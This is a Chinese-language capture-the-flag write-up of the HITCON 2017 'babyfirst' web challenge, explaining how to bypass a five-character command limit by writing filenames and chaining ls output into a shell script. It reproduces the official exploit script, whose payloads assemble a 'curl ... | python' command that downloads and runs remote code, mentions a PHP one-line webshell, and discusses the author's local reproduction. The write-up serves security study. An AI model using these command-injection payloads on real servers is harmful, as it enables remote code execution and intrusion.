从HITCON2017 babyfirst去研究ls命令

前几天做了一道HITCON2017的web题目，与朋友交流之后，有了一点思路，奈何最后还是没有成功解出这题。在writeup出来后，在复现的过程中遇到了一些问题，记录一下。

babyfirst的wp

题目的源码：index.php

大致题目的意思就是，当你在GET参数cmd的时候限制了字符的长度为5，思路就是要想办法绕过这个限制来获得webshell

官方给出的exp:

import requests
from time import sleep
from urllib import quote

payload = [
    # generate `ls -t>g` file
    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>-t\\', 
    '>\>g', 
    'ls>>_', 

    # generate `curl orange.tw.tw|python`
    '>on', 
    '>th\\', 
    '>py\\', 
    '>\|\\', 
    '>tw\\',
    '>e.\\', 
    '>ng\\', 
    '>ra\\', 
    '>o\\', 
    '>\ \\', 
    '>rl\\', 
    '>cu\\', 

    # exec
    'sh _', 
    'sh g', 
]



r = requests.get('http://52.199.204.34/?reset=1')
for i in payload:
    assert len(i) <= 5 
    r = requests.get('http://52.199.204.34/?cmd=' + quote(i) )
    print i
    sleep(0.2)

由于我是在本地搭建的环境，不太清楚他的具体环境，只要演示通过这个index.php获得一个webshell就行了。
这个思路就是先想办法通过ls命令，构造出包含 ls -t>g 这条命令的文件，然后再执行它构造出一个包含一句话木马的webshell.
先参考这个文档：

image.png

image.png

箭头指向的那个字符串，其实是的base64编码，实际上最后执行会base64解码得到PHP一句话木马。

回到之前的题目，要求的是cmd提交的参数长度小于等于5，为了实现更短的生成文件，我们使用>xxx的方式来生成一个名为xxx的文件，而不是使用w>xxx。
这个题目，由于最后要直接执行ls -t>g这条命令的话，至少需要7位的长度，因此考虑先把
ls -t>g用同样的方式把ls -t>g写进一个文件，然后使用sh命令执行这个文件就可以代替ls -t>g的功能。
Exp中

    # generate `ls -t>g` file
    '>ls\\', 
#因为ls命令显示的文件顺序是按名称来排序的，‘ \’ 会排列在 ‘ls\’ 的前面，因此需要先把 'ls\'先写入'_'这个文件，因此执行下面这条命令
    'ls>_', 
#后面的顺序，ls时默认是按照以下顺序的，因此可以直接输入
    '>\ \\', 
    '>-t\\', 
    '>\>g', 
#最后执行的这条命令，会附加到后面，正好与前面的 'ls\'结合到一起形成'ls -t>g'
    'ls>>_', 

这部分就是要完成这个功能。

重点来了，我们今天要谈论的问题就是与这个相关。

经过实际的尝试，使用python脚本，把参数按照上面的顺序post到webserver

image.png

执行之后，确实在对应的目录下面生成了一个名为_的文件，这个文件的内容为：

image.png

最后确实成功执行了ls -t>g这个命令。

注：箭头指向的 \ 实际是因为shell执行换行的命令组合时，需要 \ 来进行转义，否则会单行顺序执行命令。

然而，仔细看上面ls之后显示的文件的排列顺序，实际上在写入'_'文件之后，生成的文件内容不应该是上面的样子。
我实际在bash里面按顺序执行以下命令：

    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>\>g', 
    '>-t\\', 
    'ls>>_'

执行exp.py得到的

直接在bash终端执行得到的

生成的_文件的内容与通过exp脚本提交参数之后生成的不一样，而用sh执行之后也不能成功执行ls -t>g的命令。

究其原因，就是因为ls命令列目录的时候，'_'和'>g'这两个文件的顺序在-t>这个文件的前面。因此没有办法成功的构造出一个ls -t>g的命令。
经过在我的虚拟机上测试(kali 2.0和ubuntu 16.04)上面测试，使用bash和sh两个终端执行的结果都是一样的，无法成功构造出ls -t>g
我原本以为可能是与exec函数有关，但是实际直接在终端执行php文件的话，构造的结果还是与bash的一样。

因此，我得出的一个结论：

通过webserver中间件 和直接在终端， 执行ls命令，得到的文件的列表的顺序是不一样的。具体的原因暂时还不清楚，希望能有大佬给我指教。感激不尽。

附：本地脚本测试的时候的index.php脚本和exp.py

import requests
from time import sleep
from urllib import quote

payload = [
    # generate `ls -t>g` file
    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>\>g', 
    '>-t\\', 
    'ls>>_'
    ]

r = requests.post('http://127.0.0.1/test/?reset=1')
for i in payload:
    assert len(i) <= 5 
    r = requests.post('http://127.0.0.1/test/?cmd=' + quote(i) )
    print i
    sleep(0.2)